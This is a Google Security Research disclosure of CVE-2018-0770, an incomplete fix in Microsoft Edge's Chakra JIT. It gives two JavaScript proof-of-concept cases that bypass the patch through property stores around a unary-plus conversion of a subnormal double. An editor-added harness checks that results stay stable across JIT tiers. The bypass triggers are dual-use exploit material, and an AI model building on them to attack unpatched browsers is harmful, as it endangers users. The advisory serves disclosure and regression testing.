Microsoft Edge Chakra JIT Incomplete Fix

Google Security Research, via packetstormsecurity.com (PACKETSTORM:146375)
Published: Feb 15, 2018

EPSS score: 0.96 (High); percentile: 99.3%

Microsoft Edge: Chakra: JIT: Incomplete fix for issue 1365

CVE-2018-0770

It seems this is the patch for the bug:
https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a

The following two cases will bypass the fix.

1:

```javascript
function opt() {
    // A Number wrapper object holding a subnormal double.
    let obj = new Number(2.3023e-320);
    for (let i = 0; i < 1; i++) {
        obj.x = 1;    // property store on the Number object
        obj = +obj;   // unary plus converts obj to a primitive number
        obj.x = 1;    // property store on the primitive
    }
}

function main() {
    // Call repeatedly so opt() gets JIT-compiled.
    for (let i = 0; i < 100; i++) {
        opt();
    }
}

main();
```

2:

```javascript
function opt() {
    // A string primitive that ToNumber parses to the same subnormal double.
    let obj = '2.3023e-320';
    for (let i = 0; i < 1; i++) {
        obj.x = 1;    // property store on a string primitive
        obj = +obj;   // unary plus converts obj to a primitive number
        obj.x = 1;    // property store on the primitive
    }
}

function main() {
    // Call repeatedly so opt() gets JIT-compiled.
    for (let i = 0; i < 100; i++) {
        opt();
    }
}

main();
```

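Both cases share one shape: a property store on the starting value, a ToNumber conversion through unary plus, and a second property store on the resulting primitive number. The harness below is an added example (the editor's code, not lokihardt's report or ChakraCore's own tests) that records what ECMAScript requires at each of those steps and checks that the observable result is identical across all 100 iterations, which is the property a JIT regression test for this fix should assert: behaviour that stays the same from the first interpreted call through the later compiled ones. It also reads back the raw IEEE-754 bits of 2.3023e-320, which is a subnormal whose bit pattern is 0x1234. The function names `storeX`, `traceStores`, `runRepeated` and `doubleBits` are the editor's own.

```javascript
// Added example: trace the store / ToNumber / store pattern from the two PoC
// cases and confirm the result is stable across repeated runs.

// One property store, recording the receiver's type and whether the write stuck.
// A store on a primitive is dropped silently in sloppy mode and throws a
// TypeError in strict mode; either way a read-back of .x must not yield 1.
function storeX(receiver) {
  const type = typeof receiver;
  let threw = false;
  try {
    receiver.x = 1;
  } catch (e) {
    threw = true;
  }
  const kept = !threw && receiver.x === 1;
  return { type, kept, threw };
}

// The three-step pattern shared by both cases, starting from `initial`.
function traceStores(initial) {
  let obj = initial;
  const first = storeX(obj);  // Number object (case 1) or string primitive (case 2)
  obj = +obj;                 // ToNumber: unbox the wrapper / parse the string
  const second = storeX(obj); // receiver is now a primitive number
  return { first, second, final: obj, finalType: typeof obj };
}

// Run the pattern `iterations` times (the PoCs use 100) and report whether
// every run produced the same observable result.
function runRepeated(makeInitial, iterations = 100) {
  let reference = null;
  for (let i = 0; i < iterations; i++) {
    const key = JSON.stringify(traceStores(makeInitial()));
    if (reference === null) {
      reference = key;
    } else if (key !== reference) {
      return { stable: false, iteration: i };
    }
  }
  return { stable: true, result: JSON.parse(reference) };
}

// Raw IEEE-754 bits of a double. 2.3023e-320 is a subnormal (exponent field 0)
// whose mantissa is 0x1234, so the whole 64-bit pattern is 0x0000000000001234,
// a value that is easy to recognise if it ever shows up where a pointer or a
// tagged value was expected.
function doubleBits(x) {
  const view = new DataView(new ArrayBuffer(8));
  view.setFloat64(0, x);       // big-endian write ...
  return view.getBigUint64(0); // ... and big-endian read, so host endianness does not matter
}

// Stand-alone usage: mirrors case 1 and case 2 of the report.
const case1 = runRepeated(() => new Number(2.3023e-320));
const case2 = runRepeated(() => '2.3023e-320');
console.log(JSON.stringify(case1));
console.log(JSON.stringify(case2));
console.log('bits of 2.3023e-320: 0x' + doubleBits(2.3023e-320).toString(16));
```

In a correct engine the first store in case 1 is kept (the receiver is a real object), the first store in case 2 and the second store in both cases are not, and `final` is the primitive number 2.3023e-320 on every iteration. Any run where the result changes between iterations, or where `.x` reads back as 1 on a primitive, is the kind of tier-dependent divergence a JIT fix has to be tested against.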
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt